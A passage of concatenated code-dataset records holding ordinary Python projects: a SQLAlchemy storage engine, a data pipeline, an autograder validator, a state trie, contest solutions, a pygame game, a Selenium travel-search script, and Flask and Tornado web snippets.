models.place import Place\nfrom models.review import Review\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom os import getenv\n\n\nclasses = {'User': User, 'Place': Place, 'Review': Review,\n           'State': State, 'City': City, 'Amenity': Amenity}\n\n\nclass DBStorage():\n    \"\"\"Database storage engine backed by SQLAlchemy\"\"\"\n    __engine = None\n    __session = None\n\n    def __init__(self):\n        \"\"\"constructor\"\"\"\n        self.__engine = create_engine(\"mysql+mysqldb://{}:{}@{}/{}\"\n                                      .format(getenv('HBNB_MYSQL_USER'),\n                                              getenv('HBNB_MYSQL_PWD'),\n                                              getenv('HBNB_MYSQL_HOST'),\n                                              getenv('HBNB_MYSQL_DB')),\n                                      pool_pre_ping=True)\n        self.reload()\n        if getenv('HBNB_ENV') == 'test':\n            Base.metadata.drop_all(bind=self.__engine, checkfirst=True)\n\n    def all(self, cls=None):\n        \"\"\"queries on the current database session\"\"\"\n        objects = {}\n        for current_class in classes.values():\n            if current_class is cls or cls is None:\n                for elem in self.__session.query(current_class).all():\n                    objects[elem.__class__.__name__+'.'+elem.id] = elem\n        return objects\n\n    def new(self, obj):\n        \"\"\"add the object to the current database session\"\"\"\n        self.__session.add(obj)\n\n    def save(self):\n        \"\"\" commit all changes of the current database session \"\"\"\n        self.__session.commit()\n\n    def delete(self, obj=None):\n        \"\"\"delete from the current database session obj if not None\"\"\"\n        if obj:\n            self.__session.delete(obj)\n            self.save()\n\n    def reload(self):\n        \"\"\" create all tables in the database and start a new scoped session \"\"\"\n        Base.metadata.create_all(self.__engine)\n        session_fac = sessionmaker(bind=self.__engine, expire_on_commit=False)\n        Session = scoped_session(session_fac)\n        self.__session = Session\n\n    def close(self):\n        \"\"\"closes the current SQLAlchemy session\"\"\"\n        self.__session.close()\n","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"56422705","text":"\"\"\"\nCore data pipeline for joining dataset and generating features\n\"\"\"\nimport logging\nimport csv\nimport math\n\nimport pandas as pd \nimport numpy as np\n\nfrom config import config\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\nclass data_pipeline:\n    \"\"\" Singleton Class for generating feature dataset from acs and evictionlab data \"\"\"\n\n    def __init__(self):\n        \"\"\" Empty Constructor \"\"\"\n        pass\n\n\n    def generate_dataset(self):\n        \"\"\" Main function. 
Composes final dataset for machine learning from acs and eviction lab data \"\"\"\n acs_data_map = self.generate_acs_data_map()\n self.append_acs_data(acs_data_map)\n df = self.add_rate_features_and_drop_old_cols()\n self.impute_and_clean(df)\n self.split_data_by_year()\n return\n\n\n def generate_acs_data_map(self):\n cols_dict = config.acs_year_to_cols_map\n data_dict = {}\n\n for year in cols_dict:\n acs_data = open(config.acs_datasets_path + \"acs_\" + year[2:] + \".csv\")\n acs_reader = csv.reader(acs_data, delimiter=',')\n next(acs_reader, None)\n next(acs_reader, None)\n for row in acs_reader:\n county_fip = str(row[1])\n features = []\n features.append(row[cols_dict[year][1]])\n features.append(row[cols_dict[year][2]])\n features.append(float(row[cols_dict[year][3]])/float(row[cols_dict[year][0]]))\n features.append(float(row[cols_dict[year][4]])/float(row[cols_dict[year][0]]))\n if county_fip not in data_dict:\n data_dict[county_fip] = {}\n if year not in data_dict[county_fip]:\n data_dict[county_fip][year] = []\n data_dict[county_fip][year] = features\n acs_data.close()\n return data_dict\n\n\n def append_acs_data(self, acs_data_map):\n \"\"\"\n Appends ACS data to the eviction lab data rows.\n Inputs:\n acs_data_map (dict): Dictionary mapping of county and year to acs education and insurance data\n \"\"\"\n fp = config.intermediary_target_path \n evictions_df = pd.read_csv(config.eviction_lab_data_path)\n filtered_eviction_df = evictions_df[config.eviction_data['feature_cols']]\n\n output_csv = open(fp, 'w+')\n csv_writer = csv.writer(output_csv)\n feature_cols = config.eviction_data['feature_cols']\n csv_writer.writerow([\"GEOID\", \"year\"] + config.acs_data['feature_cols'] + config.eviction_data['feature_cols'][2:])\n for index, row in filtered_eviction_df.iterrows():\n county_fip = str(row['GEOID'])[0:5]\n curr_year = str(int(row['year']))\n if county_fip in acs_data_map and curr_year in acs_data_map[county_fip]:\n acs_data = acs_data_map[county_fip][curr_year]\n eviction_data = list(row)\n curr_row= [eviction_data[0], curr_year] + acs_data + eviction_data[2:]\n csv_writer.writerow(curr_row)\n\n return\n\n\n def add_rate_features_and_drop_old_cols(self):\n fp = config.intermediary_target_path\n filtered_eviction_df = pd.read_csv(fp)\n\n filtered_eviction_df[\"prev_year_eviction\"] = filtered_eviction_df[\"high_risk\"]\n\n # lag eviction features\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', \"prev_year_eviction\"]] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', \"prev_year_eviction\"]].shift(1)\n\n filtered_eviction_df[['eviction-filings-m2', 'evictions-m2','eviction-rate-m2', 'eviction-filing-rate-m2', 'prev_year_eviction-m2']] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', 'prev_year_eviction']].shift(1)\n\n filtered_eviction_df[['eviction-filings-m4', 'evictions-m4','eviction-rate-m4', 'eviction-filing-rate-m4', 'prev_year_eviction-m4']] = \\\n filtered_eviction_df[['eviction-filings', 'evictions','eviction-rate', 'eviction-filing-rate', 'prev_year_eviction']].shift(3)\n\n # drop rows before 2010\n filtered_eviction_df = filtered_eviction_df[filtered_eviction_df.year > 2009]\n filtered_eviction_df = filtered_eviction_df[ ['high_risk'] + [ col for col in filtered_eviction_df.columns if col != 'high_risk' ] ]\n\n return filtered_eviction_df\n\n\n @staticmethod\n def is_invalid_entry(entry):\n \"\"\" Determines if 
given single entry is invalid \"\"\"\n return (entry == \"\" or entry == \"(X)\" or (isinstance(entry, float) and math.isnan(entry)))\n \n\n @staticmethod\n def is_valid_row(row):\n \"\"\" Determines if an entire given row is invalid \"\"\"\n for j in range(len(row)):\n if data_pipeline.is_invalid_entry(row[j]):\n return False\n return True\n\n\n @staticmethod\n def clean_row_types(row):\n \"\"\" Clean types in rows \"\"\"\n for i in range(len(row)):\n if i <= 2:\n row[i] = str(int(row[i]))\n else:\n row[i] = float(row[i])\n return row\n\n\n @staticmethod\n def attempt_impute(prev_year, curr_year, next_year, prev_row, curr_row, next_row):\n if prev_year != curr_year-1 or next_year != curr_year+1:\n return None\n for i in range(3,len(curr_row)):\n if data_pipeline.is_invalid_entry(curr_row[i]):\n if not data_pipeline.is_invalid_entry(prev_row[i]) and not data_pipeline.is_invalid_entry(next_row[i]):\n curr_row[i] = (float(prev_row[i]) + float(next_row[i])) / 2.0\n else:\n return None\n return curr_row\n \n def impute_and_clean(self, filtered_eviction_df, output_path=config.final_unsplit_target_path, fill_na_median=False):\n output_csv = open(output_path, 'w+')\n csv_writer = csv.writer(output_csv)\n\n if fill_na_median:\n filtered_eviction_df[[col for col in filtered_eviction_df.columns]] = filtered_eviction_df[[col for col in filtered_eviction_df.columns]].fillna(filtered_eviction_df.median())\n\n prev_row = None\n prev_year = None\n curr_row = None\n curr_year = None\n\n for index, row in filtered_eviction_df.iterrows():\n next_row = list(row)\n next_year = int(row['year'])\n if curr_row is not None and not data_pipeline.is_valid_row(curr_row):\n impute = data_pipeline.attempt_impute(prev_year, curr_year, next_year, prev_row, curr_row, next_row)\n if impute is not None:\n curr_row = impute\n \n if prev_row is not None and data_pipeline.is_valid_row(prev_row):\n csv_writer.writerow(data_pipeline.clean_row_types(prev_row))\n\n prev_row = curr_row\n prev_year = curr_year\n curr_row = row\n curr_year = int(row['year'])\n\n for row in (prev_row, curr_row):\n if data_pipeline.is_valid_row(row):\n csv_writer.writerow(data_pipeline.clean_row_types(row))\n return\n\n\n def split_data_by_year(self):\n \"\"\" Split single data file into yearly files for temporal train-testing \"\"\"\n dataset = open(config.final_unsplit_target_path)\n reader = csv.reader(dataset, delimiter=',')\n \n f_handles = []\n writers = {}\n for year in config.acs_year_to_cols_map:\n f = open(config.yearly_target_path + str(year) + \".csv\", \"w+\")\n writer = csv.writer(f)\n f_handles.append(f)\n writers[year] = writer\n\n for row in reader:\n year = str(int(float(row[2])))\n writers[year].writerow(row)\n\n for f in f_handles:\n f.close()\n\nif __name__ == \"__main__\":\n d = data_pipeline()\n d.generate_dataset()\n\n","sub_path":"src/data_processing/dataset_pipeline.py","file_name":"dataset_pipeline.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"392141218","text":"\"\"\"Autograde the iclicker remote submission.\"\"\"\nimport os\nimport sys\nimport json\n\n\nGLOBAL_INPUT_JSON_PATH = 'custom_validator_input.json'\n\n\ndef get_tc_json():\n \"\"\"Get the json for this testcase.\"\"\"\n try:\n with open(GLOBAL_INPUT_JSON_PATH) as json_file:\n tc = json.load(json_file)\n except Exception:\n return_error('Could not custom_validator_input.json')\n return tc\n\n\ndef get_actual_files():\n \"\"\"Load the actual files.\n\n To find 
actual files, we look for all of the files\n listed in the 'actual_file' section of this validator.\n \"\"\"\n try:\n with open(GLOBAL_INPUT_JSON_PATH) as json_file:\n tc = json.load(json_file)\n # Grab the folder housing the files.\n prefix = tc['testcase_prefix']\n except Exception:\n return_error('Could not custom_validator_input.json')\n\n # There can be either one actual file (a string) or\n # a list of actual files.\n if isinstance(tc['actual_file'], str):\n actual_files = list([os.path.join(prefix, tc['actual_file']), ])\n else:\n actual_files = list()\n for file in tc['actual_file']:\n actual_files.append(os.path.join(prefix, file))\n return actual_files\n\n\ndef return_result(score, message, status):\n \"\"\"Create response to student.\n\n This function should be used to return grading results to a student.\n\n Status success means the grader worked as intended (no validator\n failures) Data contains the students score (range from 0 to 1), a\n message to the student, and the status (color) for the\n message. Status can be 'information', ' 'warning', or 'success'.\n \"\"\"\n result = {\n 'status': \"success\",\n 'data': {\n 'score': score,\n 'message': message,\n 'status': status\n }\n }\n\n # print the json to stdout so that it can be read by submitty.\n print(json.dumps(result, indent=4))\n sys.exit(0)\n\n\ndef return_error(error_message):\n \"\"\"Create response to student.\n\n This function should be used to return an error message if the validator crashes.\n\n Status failure means the validator failed to process the student\n submission. Message contains an error message to be output for\n instructor/student debugging. This submission will receive a score of zero.\n \"\"\"\n result = {\n 'status': \"fail\",\n 'message': error_message\n }\n print(json.dumps(result, indent=4))\n sys.exit(0)\n\n\ndef main():\n \"\"\"Do the main thing.\"\"\"\n actual_files = get_actual_files()\n for file in actual_files:\n try:\n with open(file) as f:\n iclicker_string = f.read()\n iclicker_string = iclicker_string.replace('\\n', '')\n iclicker_ids = iclicker_string.split(',')\n\n for my_id in iclicker_ids:\n if \"T24\" in my_id:\n return_result(score=0,\n message=\"ERROR: '\" + str(my_id) +\n \"' looks like model number\",\n status='failure')\n if len(my_id) != 8:\n return_result(score=0,\n message=\"ERROR: '\" + str(my_id) +\n \"' is not 8 digits\",\n status='failure')\n\n return_result(score=1, message=\"success!\", status='success')\n\n except Exception:\n return_result(score=0,\n message=\"ERROR: Could not open output file.\"+str(file),\n status='failure')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"more_autograding_examples/iclicker_upload/config/custom_validation_code/grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"188123590","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2018-05-24 15:13:31\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n\nimport os,sys\nimport json\nimport hashlib \n\nclass TreeObj(object):\n \"\"\"docstring for MTCLTree\"\"\"\n def __init__(self, baseData,layer,pid,maxdeep = 7): #默认深度为24小时\n super(TreeObj, self).__init__()\n self.baseState = baseData\n self.maxdeep = maxdeep\n self.stateCount = 1\n self.childLayer = layer\n self.stateList = []\n self.childTab = {}\n self.pid = pid #父节点id\n self.oid = self.createOIDWithPID() #当前节点id\n def createOIDWithPID(self):\n if 
self.pid == 0:\n return str(self.pid)\n oid = str(self.pid) + '_' + str(self.baseState)\n return oid\n\n def addStateList(self,plist):\n tmps = list(plist)\n scount = len(tmps)\n while tmps:\n frontstate = tmps.pop(0)\n scount -= 1\n if scount <= 0:\n if frontstate in self.childTab:\n self.childTab[frontstate].stateCount += 1\n else:\n if self.childLayer < self.maxdeep:\n # print('create',self.childLayer+1,frontstate)\n self.childTab[frontstate] = TreeObj(frontstate,self.childLayer + 1,self.oid,self.maxdeep)\n else:\n # print(self.childLayer+1,frontstate,tmps)\n self.childTab[frontstate].childAddStateList(tmps)\n # print('*'*10)\n def childAddStateList(self,plist):\n tmps = list(plist)\n scount = len(tmps)\n frontstate = tmps.pop(0)\n scount -= 1\n if scount <= 0:\n self.stateList.append(frontstate)\n if len(self.stateList) > self.maxdeep:\n self.stateList.pop(0)\n if frontstate in self.childTab:\n self.childTab[frontstate].stateCount += 1\n else:\n if self.childLayer < self.maxdeep:\n # print('create',self.childLayer+1,frontstate)\n self.childTab[frontstate] = TreeObj(frontstate,self.childLayer + 1,self.oid,self.maxdeep)\n else:\n # print(self.childLayer+1,frontstate,tmps)\n self.childTab[frontstate].childAddStateList(tmps)\n def addChildState(self,childState):\n \n #增加子节点状态\n self.stateList.append(childState)\n if len(self.stateList) > self.maxdeep:\n self.stateList.pop(0)\n\n self.addStateList(self.stateList)\n \n #获取子树分支序列\n def getStateListChildTree(self,pSlist):\n\n if len(pSlist) == 1 and (pSlist[0] in self.childTab):\n return self.childTab[pSlist[0]]\n else:\n tmps = list(pSlist)\n\n childTree = None\n p = tmps.pop(0)\n if p in self.childTab:\n childTree = self.childTab[p].getStateListChildTree(tmps)\n\n return childTree\n\n #分析未来pDeep分钟深度的最大概率和最小概率分布\n def analysisChildStateForDeep(self,pDeep):\n if pDeep <= 1:\n maxc = 0\n count = 0\n deepchild = []\n for c in self.childTab.keys():\n if self.childTab[c].stateCount > maxc:\n maxc = self.childTab[c].stateCount\n deepchild = [self.childTab[c]]\n elif self.childTab[c].stateCount == maxc:\n deepchild.append(self.childTab[c])\n\n count += self.childTab[c].stateCount\n outdeep = []\n for d in deepchild:\n outdeep.append([d,count,len(self.childTab)])\n return outdeep\n else:\n deepdata = []\n maxpCount = 0.0\n for c in self.childTab.keys():\n tmpdeep = self.childTab[c].analysisChildStateForDeep(pDeep - 1)\n if tmpdeep:\n deepchild = tmpdeep[0][0]\n count = tmpdeep[0][1]\n childcount = tmpdeep[0][2]\n if count != 0:\n d = deepchild[0]\n tmp = (d.stateCount/float(count))\n if maxpCount < tmp:\n maxpCount = tmp\n deepdata = []\n for d in tmpdeep:\n deepdata.append([d[0],d[1],d[2]])\n elif maxpCount == tmp:\n for d in tmpdeep:\n deepdata.append([d[0],d[1],d[2]])\n\n return deepdata\n\n def getChildLeaf(self,outlist,child,pdeep):\n for c in child.childTab.keys():\n ch = child.childTab[c]\n if pdeep == 0:\n outlist.append(ch)\n else:\n ch.getChildLeaf(outlist,ch,pdeep = pdeep - 1)\n\n def getChildLeafForDeep(self,deep):\n outlist = []\n self.getChildLeaf(outlist, self, deep-1)\n # count1 = 0\n # count2 = 0\n # count3 = 0\n # count4 = 0\n # count5 = 0\n # out = []\n # for c1 in self.childTab.keys():\n # ch1 = self.childTab[c1]\n # count1 += ch1.stateCount\n # tmpcount5 = ch1.stateCount\n # for c2 in ch1.childTab.keys():\n # ch2 = ch1.childTab[c2]\n # count2 += ch2.stateCount\n # tmpcount5 += ch2.stateCount\n # for c3 in ch2.childTab.keys():\n # ch3 = ch2.childTab[c3]\n # count3 += ch3.stateCount\n # tmpcount5 += ch3.stateCount\n # for c4 in 
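# (Editor's aside -- illustration only, not part of TreeObj; kept in comments
# so the surrounding method is untouched.) The tree above is a prefix-count
# trie over sliding windows of recent states; the same counts can be
# cross-checked with a plain Counter keyed by tuples:
#
#     from collections import Counter
#
#     def window_counts(states, width):
#         return Counter(tuple(states[i:i + width])
#                        for i in range(len(states) - width + 1))
#
#     window_counts([1, 2, 3, 1, 2, 1, 3], 2)
#     # Counter({(1, 2): 2, (2, 3): 1, (3, 1): 1, (2, 1): 1, (1, 3): 1})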
ch3.childTab.keys():\n        #                 ch4 = ch3.childTab[c4]\n        #                 count4 += ch4.stateCount\n        #                 tmpcount5 += ch4.stateCount\n        #                 for c5 in ch4.childTab.keys():\n        #                     ch5 = ch4.childTab[c5]\n        #                     count5 += ch5.stateCount\n        #                     tmpcount5 += ch5.stateCount\n        #                     out.append([ch5,tmpcount5])\n        \n        return outlist\n\ndef getChilds(tree,layers,deeps,layerdeep,startdeeps):\n    for c in tree.childTab.keys():\n        chtmp = tree.childTab[c]\n        if len(layers) <= layerdeep:\n            layers.append([])\n        if len(deeps) <= layerdeep:\n            deeps.append([])\n        layerstr = 'layer%d'%(layerdeep + 1)\n        layers[layerdeep].append([layerstr,c,len(chtmp.childTab),chtmp.stateCount,chtmp.childLayer])\n        tmpd = [] + startdeeps\n        tmpd.append(c)\n        deeps[layerdeep].append(tmpd)\n        getChilds(chtmp, layers, deeps, layerdeep + 1,tmpd)\n\ndef main():\n    sts = [1,2,3,1,2,1,3]\n    # sts = [1,2,3,1]\n    treeobj = TreeObj(0,0,0,7)\n\n    for s in sts:\n        treeobj.addChildState(s)\n\n    print(len(treeobj.childTab))\n    print('-'*10)\n\n    layers = []\n    deeps = []\n\n    getChilds(treeobj, layers, deeps, 0,[])\n\n    for n in range(len(layers)):\n        l = layers[n]\n        print('------layer%d-------'%(n+1))\n        for lx in l:\n            print(lx)\n        print('\\n')\n    for n in range(len(deeps)):\n        d = deeps[n]\n        print('+++++++deep%d+++++++'%(n+1))\n        for dx in d:\n            print(dx)\n\n# Test run\nif __name__ == '__main__':\n    main()\n    \n","sub_path":"pyscripte2/TreeObj.py","file_name":"TreeObj.py","file_ext":"py","file_size_in_byte":7416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"129690557","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 31 20:01:00 2019\n\n@author: masat\n\"\"\"\n# Receive the first input: an integer a.\na = input()\n# Receive the second input: integers b and c separated by a space.\nb, c = input().split()\n# Receive the third input: a string s.\ns = input()\n\n#print(\"a = {}, type {}\".format(a, type(a)))\n#print(\"b = {}, type {}\".format(b, type(b)))\n#print(\"s = {}, type {}\".format(c, type(c)))\n#print(\"s = {}, type {}\".format(s, type(s)))\n\n# Convert a, b and c from str to int.\n[a, b, c] = map(int, [a, b, c])\n\n#print(\"a = {}, type {}\".format(a, type(a)))\n#print(\"b = {}, type {}\".format(b, type(b)))\n#print(\"s = {}, type {}\".format(c, type(c)))\n#print(\"s = {}, type {}\".format(s, type(s)))\n\n# Take the sum of a, b and c.\nsum_abc = a + b + c\n\n# Print sum_abc and s on one line, separated by a space and ending with a newline.\nprint(\"{} {}\".format(sum_abc, s))\n","sub_path":"AtCoder_Python3/ABS/Welcome_to_AtCoder_HH1.py","file_name":"Welcome_to_AtCoder_HH1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"394052993","text":"n = int(input())\na = list(map(int, input().split()))\n\nm = 1000\ns = 0\n\nfor i in range(n-1):\n    if a[i] < a[i+1]:\n        s = m // a[i]\n        m += (a[i+1]-a[i]) * s\n\nprint(m)\n\n# Not solved yet\n","sub_path":"Python_codes/p02603/s938798133.py","file_name":"s938798133.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"338250222","text":"import pygame, sys, random, time\nfrom pygame.locals import *\npygame.init()\n\n# Creates size of screen\nwindowSize= [640,480]\nscreen = pygame.display.set_mode(windowSize)\nclock = pygame.time.Clock()\n\nblue = pygame.color.Color('#0a32f4')\nred = pygame.color.Color('#ff0000')\nyellow = pygame.color.Color('#ffff00')\nblack = pygame.color.Color('#000000')\nwhite = pygame.color.Color('#ffffff')\nhalf_black = pygame.color.Color('#000000cc')\n\n#loads player image by using variable\nplayer = pygame.image.load(\"mario.png\")\n#changes the 
size\nplayer = pygame.transform.scale(player, (30,45))\n\n#.get_rect gets baasically the position of the image\npos = player.get_rect()\n\n#this is a list and saved the number 320 and 240\npos.center = [320,240]\n\n#font\nbasicFont = pygame.font.Font('freesansbold.ttf', 32)\n\n# Text\ngameOverSurf = basicFont.render(\"You survived:\", True, white)\ngameOverRect = gameOverSurf.get_rect()\ngameOverRect.center = (320, 130)\n\nmaxStars = 6\n\n\ndef main():\n #grabs the position 0 from the list pos and stores it in x which is 320\n playerx = pos.center[0]\n playery = pos.center[1]\n while True:\n runGame()\n\n\ndef runGame():\n\n \n \n global stars\n \n #starting player position\n playerx = (windowSize[0]/2)-40\n playery = 410\n\n pos.center = [playerx,playery]\n\n\n \n\n\n #list to hold star object\n stars = []\n\n # clock\n start = time.time()\n time.clock()\n elapsed = 0\n \n \n while True:\n\n # Create clock object\n clockSurf = basicFont.render(getTime(start, elapsed), True, white)\n clockRect = clockSurf.get_rect()\n clockRect.center = (320, 20)\n screen.fill(black)\n \n # Draw the floor\n pygame.draw.rect(screen, blue, [0, 440, windowSize[0], 40])\n\n\t\t\n # move falling stars\n for fsObj in stars:\n fsObj['y'] += fsObj['fallingVelocity']\n fsObj['rect'] = pygame.Rect((fsObj['x'], fsObj['y'], fsObj['width'], fsObj['height']))\n\t\t\t\n # draw falling stars\n drawStars()\n\t\t\n # remove off screen stars\n for i in range(len(stars) - 1, -1, -1):\n if stars[i]['y'] > 480:\n del stars[i]\n\t\t\n # add falling stars to list stars\n if len(stars) < maxStars:\n stars.append(createFallingStar())\n \n keys = pygame.key.get_pressed()\n \n\n if keys[K_a] or keys[K_LEFT]:\n playerx -= 10\n if keys[K_d] or keys[K_RIGHT]:\n playerx += 10\n\n if playerx + 40< 0:\n playerx = 500\n elif playerx > 600:\n playerx = 10\n\n pos.center = [playerx,playery]\n #sets up the screen with the image stored in player and in location of pos\n screen.blit(player, pos)\n #pygame.display.flip()\n # player = pygame.draw.rect(screen, red, [playerx, playery, 80, 40])\n \n\n # draw clock\n screen.blit(clockSurf, clockRect)\n\n # check if player collides with a star\n for i in range(len(stars) -1, -1, -1):\n star = stars[i]\n if pos.colliderect(star['rect']):\n print(\"hit\", pygame.time.get_ticks()*.001)\n endScreen(start, elapsed)\n return\n \n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n pygame.display.flip()\n clock.tick(60)\ndef endScreen(start, elapsed):\n # Fonts\n smallFont = pygame.font.Font('freesansbold.ttf', 16)\n largeFont = pygame.font.Font('freesansbold.ttf', 128)\n \n # Transparent overlay\n coverFill = pygame.Surface((640,480), pygame.SRCALPHA, 32)\n coverFill.fill(half_black)\n screen.blit(coverFill, (0,0))\n \n # Text\n endClockSurf = largeFont.render(getTime(start, elapsed), True, white)\n endClockRect = gameOverSurf.get_rect()\n endClockRect.center = (260, 160)\n \n gameOverSurf2 = smallFont.render(\"Press R to restart\", True, white)\n gameOverRect2 = gameOverSurf.get_rect()\n gameOverRect2.center = (360, 380)\n \n # draw the text\n screen.blit(gameOverSurf, gameOverRect)\n screen.blit(gameOverSurf2, gameOverRect2)\n screen.blit(endClockSurf, endClockRect)\n pygame.display.flip()\n\n while True:\t\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n elif event.key == pygame.K_r:\n return\n clock.tick(60)\n\ndef 
getTime(start, elapsed):\n seconds = int(time.time() - start)\n struct_time = time.gmtime(seconds)\n return time.strftime(\"%M:%S\", struct_time)\n\ndef createFallingStar():\n fs = {}\n randomSize = random.randint(30,40)\n fs['width'] = randomSize\n fs['height'] = randomSize\n fs['x'] = random.randint(0,600)\n fs['y'] = (-40)\n fs['fallingVelocity'] = random.randint(7, 13)\n fs['rect'] = pygame.Rect((fs['x'], fs['y'], fs['width'], fs['height']))\n return fs\n\ndef drawStars():\n for fsObj in stars:\n pygame.draw.rect(screen, yellow, [fsObj['x'], fsObj['y'], fsObj['width'], fsObj['height']])\n\n#function to close game\ndef terminate():\n pygame.quit()\n sys.exit()\n\nif __name__== '__main__':\n main()\n \n","sub_path":"clGameMario.py","file_name":"clGameMario.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"572174782","text":"import sqlite3\nimport os.path\nfrom contextlib import closing\n\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"blog.sqlite\")\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\ndef get_db():\n\n # attach db to global\n if \"db\" not in g:\n g.db = sqlite3.connect(\n db_path,\n detect_types=sqlite3.PARSE_DECLTYPES,\n isolation_level=\"DEFERRED\"\n )\n g.db.cursor().execute(\"PRAGMA journal_mode=WAL\")\n g.db.row_factory = dict_factory\n\n # return db\n return g.db\n\ndef query_db(query, args=(), one=False):\n\n # query and close cursor\n with closing(get_db().cursor().execute(query, args)) as cur:\n rv = cur.fetchall()\n return (rv[0] if rv else None) if one else rv\n\ndef close_db(e=None):\n\n # close connection\n db = g.pop('db', None)\n if db is not None:\n db.close()","sub_path":"flaskApp/db/sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"43274928","text":"\n\nfrom browserLaunch import launchChrome as lp\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nlp.driver.get(\"https://www.redbus.in/\")\n\nlp.driver.find_element_by_css_selector(\"#src\").send_keys(\"Hyd\")\ntime.sleep(2)\nsrclist = lp.driver.find_elements_by_xpath(\"//ul[@class='autoFill']/li\")\n\nprint(\"No of pickup points\",len(srclist))\n\nfor li in srclist:\n # print(li.text)\n if li.text == \"Bhel, Hyderabad\":\n li.click()\n break\n\n\nlp.driver.find_element_by_css_selector(\"#dest\").send_keys(\"Bangalore (All Locations)\",Keys.ENTER)\n\nlp.driver.find_element_by_css_selector(\".icon-onward-calendar.icon\").click()\n\nonWardCal = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_onward_cal']/table/tbody/tr/td\")\n\nfor li in onWardCal:\n if li.text == \"10\":\n li.click()\n break\n\n\nlp.driver.find_element_by_css_selector(\".icon-return-calendar.icon\").click()\n\nreturnDate = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_return_cal']/table/tbody/tr/td\")\n\n\nfor li in returnDate:\n if li.text != \"Apr 2020\":\n lp.driver.find_element_by_xpath(\"(//button[text()='>'])[2]\").click()\n break\n\n\n\nreturnDate = lp.driver.find_elements_by_xpath(\"//div[@id='rb-calendar_return_cal']/table/tbody/tr/td\")\n\n\nfor li in returnDate:\n if li.text == \"20\":\n li.click()\n 
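# (Editor's aside -- illustration only, not part of this script; kept in
# comments so the loop above is untouched.) Every calendar/autosuggest loop
# here follows one idiom: re-fetch the element list, act on the first match,
# then break so stale element references are never reused. The pattern in
# isolation, where `elements` stands in for driver.find_elements_by_xpath(...):
#
#     def click_first(elements, wanted_text):
#         for el in elements:
#             if el.text == wanted_text:
#                 el.click()
#                 return True    # acted on exactly one element
#         return False           # no match; caller may paginate and retry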
break\n\nlp.driver.find_element_by_css_selector(\"#search_btn\").click()\n\n\n\n\ntime.sleep(5)\n# lp.driver.quit()\n\n\n\n","sub_path":"SeleniumBuiltins/Autosuggest.py","file_name":"Autosuggest.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"587067113","text":"import tornado.web\nimport tornado.gen\nimport json\nimport io\nimport logging\n\nimport motor\n\nimport mickey.userfetcher\nfrom mickey.basehandler import BaseHandler\n\nclass BindHandler(BaseHandler):\n @tornado.web.asynchronous\n @tornado.gen.coroutine\n def post(self):\n publish = self.application.loginpublish\n token = self.request.headers.get(\"Authorization\", \"\")\n coll = self.application.db.users\n data = json.loads(self.request.body.decode(\"utf-8\"))\n bindkey = data.get(\"bindkey\", \"\")\n\n logging.info(\"begin to handle accept bind request %s\" % bindkey)\n \n if not bindkey:\n self.set_status(403)\n self.finish()\n return\n \n user = yield mickey.userfetcher.getcontact(self.p_userid, token) \n\n if not user:\n self.set_status(404)\n self.finish()\n return\n\n #send notify to pc client, bind request was accept\n notify = {}\n notify[\"type\"] = \"user_notify\"\n\n content = {}\n content[\"userid\"] = self.p_userid\n content[\"nickname\"] = user.get(\"commName\", \"\")\n\n notify[\"notify\"] = content\n\n publish.pushmsg(bindkey, notify)\n\n self.finish()\n","sub_path":"handlers/bindhandler.py","file_name":"bindhandler.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"577294549","text":"import os\n\nfrom flask import Flask\nfrom flask_bootstrap import Bootstrap\n\nfrom . import api, user, thing, db, mqtt_client\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config.from_mapping(\n SECRET_KEY='dev',\n AMAZON_CLIENT_ID='client_id',\n AMAZON_CLIENT_SECRET='client_secret',\n 